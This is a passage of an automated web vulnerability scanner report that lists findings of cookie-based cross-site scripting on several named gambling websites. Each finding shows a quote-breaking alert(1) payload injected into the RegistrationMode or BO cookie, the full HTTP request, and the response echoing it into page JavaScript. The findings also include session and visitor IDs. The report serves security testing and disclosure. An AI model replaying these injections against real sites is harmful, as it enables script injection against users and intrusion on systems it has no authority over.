Content-Type: text/html; charset=utf-8
Content-Length: 46640

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMae4cb"-alert(1)-"dee9fdf9e7a";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.228. http://www.bigmoneyscratch.com/SecurityAndPrivacy.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/SecurityAndPrivacy.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 248d6"-alert(1)-"a6b9fa5a2fb was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM248d6"-alert(1)-"a6b9fa5a2fb; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:08:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM248d6"-alert(1)-"a6b9fa5a2fb; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:05 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:05 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:05 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:05 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:05 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46640

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM248d6"-alert(1)-"a6b9fa5a2fb";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.229. http://www.bigmoneyscratch.com/Terms.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/Terms.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4217c"-alert(1)-"39848cc3718 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Terms.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM4217c"-alert(1)-"39848cc3718; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:08:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:58 GMT; path=/
Set-Cookie: BO=FM4217c"-alert(1)-"39848cc3718; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:58 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:58 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:58 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:58 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 109535

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM4217c"-alert(1)-"39848cc3718";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.230. http://www.bigmoneyscratch.com/Terms.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/Terms.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fcb8"-alert(1)-"5c11f941 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Terms.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM8fcb8"-alert(1)-"5c11f941; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:08:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM8fcb8"-alert(1)-"5c11f941; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:18 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:18 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:18 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:18 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:18 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 109532

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM8fcb8"-alert(1)-"5c11f941";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.231. http://www.bigmoneyscratch.com/UnderAge.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/UnderAge.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 233fb"-alert(1)-"5a158f0a2c was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM233fb"-alert(1)-"5a158f0a2c; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:09:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:09:44 GMT; path=/
Set-Cookie: BO=FM233fb"-alert(1)-"5a158f0a2c; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:09:44 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:09:44 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:09:44 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:09:44 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM233fb"-alert(1)-"5a158f0a2c";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.232. http://www.bigmoneyscratch.com/UnderAge.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/UnderAge.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 530ff"-alert(1)-"7f555105e68 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM530ff"-alert(1)-"7f555105e68; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:08:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM530ff"-alert(1)-"7f555105e68; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:58 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:58 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:58 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:58 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:58 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45872

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM530ff"-alert(1)-"7f555105e68";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.233. http://www.hopa.com/ [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hopa.com
Path:	/

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd50c"-alert(1)-"8a8c36cbbdb was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: www.hopa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=B7E205F9FF290BAED7305BD74C2DA067; LanguageCode=ENG; RegistrationMode=PM; BO=FMbd50c"-alert(1)-"8a8c36cbbdb; CSI_4=EncryptedUniqueVisitorID=B7E205F9FF290BAED7305BD74C2DA067&AffiliateID=4&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=4; ASP.NET_SessionId=e01kb5453bgwt555nikmx12o;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:12:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=hopa.com; expires=Fri, 16-May-2014 12:12:45 GMT; path=/
Set-Cookie: BO=FMbd50c"-alert(1)-"8a8c36cbbdb; domain=hopa.com; expires=Fri, 16-May-2014 12:12:45 GMT; path=/
Set-Cookie: UniqueVisitorID=B7E205F9FF290BAED7305BD74C2DA067; domain=hopa.com; expires=Fri, 16-May-2014 12:12:45 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=hopa.com; expires=Fri, 16-May-2014 12:12:45 GMT; path=/
Set-Cookie: CountryCode=US; domain=hopa.com; expires=Fri, 16-May-2014 12:12:45 GMT; path=/
Set-Cookie: CSITemp=4; domain=hopa.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44729

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMbd50c"-alert(1)-"8a8c36cbbdb";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.234. http://www.hopa.com/ [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hopa.com
Path:	/

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39c1f"-alert(1)-"7818844582d was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: www.hopa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=B7E205F9FF290BAED7305BD74C2DA067; LanguageCode=ENG; RegistrationMode=PM39c1f"-alert(1)-"7818844582d; BO=FM; CSI_4=EncryptedUniqueVisitorID=B7E205F9FF290BAED7305BD74C2DA067&AffiliateID=4&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=4; ASP.NET_SessionId=e01kb5453bgwt555nikmx12o;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:11:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM39c1f"-alert(1)-"7818844582d; domain=hopa.com; expires=Fri, 16-May-2014 12:11:59 GMT; path=/
Set-Cookie: BO=FM; domain=hopa.com; expires=Fri, 16-May-2014 12:11:59 GMT; path=/
Set-Cookie: UniqueVisitorID=B7E205F9FF290BAED7305BD74C2DA067; domain=hopa.com; expires=Fri, 16-May-2014 12:11:59 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=hopa.com; expires=Fri, 16-May-2014 12:11:59 GMT; path=/
Set-Cookie: CountryCode=US; domain=hopa.com; expires=Fri, 16-May-2014 12:11:59 GMT; path=/
Set-Cookie: CSITemp=4; domain=hopa.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44729

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM39c1f"-alert(1)-"7818844582d";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.235. http://www.info.crazyscratch.com/AboutUs.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/AboutUs.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ebf6"-alert(1)-"fd5c46226b0 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM4ebf6"-alert(1)-"fd5c46226b0; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:50:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:41 GMT; path=/
Set-Cookie: BO=FM4ebf6"-alert(1)-"fd5c46226b0; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:41 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:41 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:41 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:41 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 57142

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM4ebf6"-alert(1)-"fd5c46226b0";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.236. http://www.info.crazyscratch.com/AboutUs.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/AboutUs.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ffd0a"-alert(1)-"8939955fc8f was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PMffd0a"-alert(1)-"8939955fc8f; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:50:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMffd0a"-alert(1)-"8939955fc8f; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:04 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:04 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:04 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:04 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:04 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 57142

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMffd0a"-alert(1)-"8939955fc8f";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.237. http://www.info.crazyscratch.com/ContactUsFax.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/ContactUsFax.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8e84"-alert(1)-"add043d468d was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ContactUsFax.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FMf8e84"-alert(1)-"add043d468d; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:51:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
